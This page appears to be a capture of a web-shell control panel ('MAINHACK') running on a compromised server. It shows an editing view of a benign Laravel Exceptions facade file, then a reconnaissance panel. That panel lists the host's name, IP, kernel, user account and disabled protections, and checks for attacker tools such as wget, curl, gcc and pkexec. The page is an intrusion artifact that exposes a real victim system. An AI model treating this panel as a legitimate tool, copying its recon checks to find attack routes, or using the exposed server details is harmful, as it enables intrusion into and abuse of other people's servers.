[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Exceptions.php
<?php namespace Illuminate\Support\Facades; use Illuminate\Contracts\Debug\ExceptionHandler; use Illuminate\Support\Arr; use Illuminate\Support\Testing\Fakes\ExceptionHandlerFake; /** * @method static void register() * @method static \Illuminate\Foundation\Exceptions\ReportableHandler reportable(callable $reportUsing) * @method static \Illuminate\Foundation\Exceptions\Handler renderable(callable $renderUsing) * @method static \Illuminate\Foundation\Exceptions\Handler map(\Closure|string $from, \Closure|string|null $to = null) * @method static \Illuminate\Foundation\Exceptions\Handler dontReport(array|string $exceptions) * @method static \Illuminate\Foundation\Exceptions\Handler ignore(array|string $exceptions) * @method static \Illuminate\Foundation\Exceptions\Handler dontFlash(array|string $attributes) * @method static \Illuminate\Foundation\Exceptions\Handler level(string $type, void $level) * @method static void report(\Throwable $e) * @method static bool shouldReport(\Throwable $e) * @method static \Illuminate\Foundation\Exceptions\Handler throttleUsing(callable $throttleUsing) * @method static \Illuminate\Foundation\Exceptions\Handler stopIgnoring(array|string $exceptions) * @method static \Illuminate\Foundation\Exceptions\Handler buildContextUsing(\Closure $contextCallback) * @method static \Symfony\Component\HttpFoundation\Response render(\Illuminate\Http\Request $request, \Throwable $e) * @method static \Illuminate\Foundation\Exceptions\Handler respondUsing(callable $callback) * @method static \Illuminate\Foundation\Exceptions\Handler shouldRenderJsonWhen(callable $callback) * @method static \Illuminate\Foundation\Exceptions\Handler dontReportDuplicates() * @method static \Illuminate\Contracts\Debug\ExceptionHandler handler() * @method static void assertNothingReported() * @method static void assertReported(\Closure|string $exception) * @method static void assertReportedCount(int $count) * @method static void assertNotReported(\Closure|string $exception) * @method static void renderForConsole(\Symfony\Component\Console\Output\OutputInterface $output, \Throwable $e) * @method static \Illuminate\Support\Testing\Fakes\ExceptionHandlerFake throwFirstReported() * @method static \Illuminate\Support\Testing\Fakes\ExceptionHandlerFake setHandler(\Illuminate\Contracts\Debug\ExceptionHandler $handler) * * @see \Illuminate\Foundation\Exceptions\Handler * @see \Illuminate\Contracts\Debug\ExceptionHandler * @see \Illuminate\Support\Testing\Fakes\ExceptionHandlerFake */ class Exceptions extends Facade { /** * Replace the bound instance with a fake. * * @param array<int, class-string<\Throwable>>|class-string<\Throwable> $exceptions * @return \Illuminate\Support\Testing\Fakes\ExceptionHandlerFake */ public static function fake(array|string $exceptions = []) { $exceptionHandler = static::isFake() ? static::getFacadeRoot()->handler() : static::getFacadeRoot(); return tap(new ExceptionHandlerFake($exceptionHandler, Arr::wrap($exceptions)), function ($fake) { static::swap($fake); }); } /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return ExceptionHandler::class; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.37 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002